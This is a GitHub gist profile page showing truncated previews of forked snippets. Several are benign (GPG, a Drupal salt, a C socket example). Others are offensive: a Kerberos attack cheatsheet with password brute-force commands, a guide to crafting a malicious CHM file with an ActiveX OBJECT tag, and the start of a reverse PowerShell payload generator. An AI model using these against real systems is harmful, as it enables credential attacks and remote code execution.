Skip to content

Instantly share code, notes, and snippets.

View wxrdnx's full-sized avatar
🐈
🐱

wxrdnx

🐈
🐱
  • University of Wisconsin
  • Madison, Wisconsin
View GitHub Profile
@wxrdnx
wxrdnx / GNUPG Cheatsheet.md
Created May 2, 2024 03:11 — forked from turingbirds/GNUPG Cheatsheet.md
GPG (GNUPG) Cheatsheet

GNUPG CHEATSHEET

Setting up: key generation

This generates a public/private keypair.

$ gpg --gen-key

$ gpg --list-secret-keys

@wxrdnx
wxrdnx / kerberos_attacks_cheatsheet.md
Created January 17, 2024 01:17 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@wxrdnx
wxrdnx / gen-d8-salt.sh
Created August 16, 2023 16:30 — forked from pfaocle/gen-d8-salt.sh
Generate Drupal 8 hash salt
drush eval "var_dump(Drupal\Component\Utility\Crypt::randomBytesBase64(55))"
@wxrdnx
wxrdnx / Malicious-CHM-Guide.md
Last active August 9, 2023 22:33 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation(HTMLHelp.exe & HelpDocs.zip)
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@wxrdnx
wxrdnx / simple_socket_example.c
Created July 18, 2023 08:07 — forked from browny/simple_socket_example.c
simple socket example in C
/* --- Usage --- */
g++ server.c -o server
g++ client.c -o client
./server
./client 127.0.0.1
/* --- server.c --- */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
@wxrdnx
wxrdnx / mkpsrevshell.py
Created July 7, 2023 03:40 — forked from tothi/mkpsrevshell.py
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])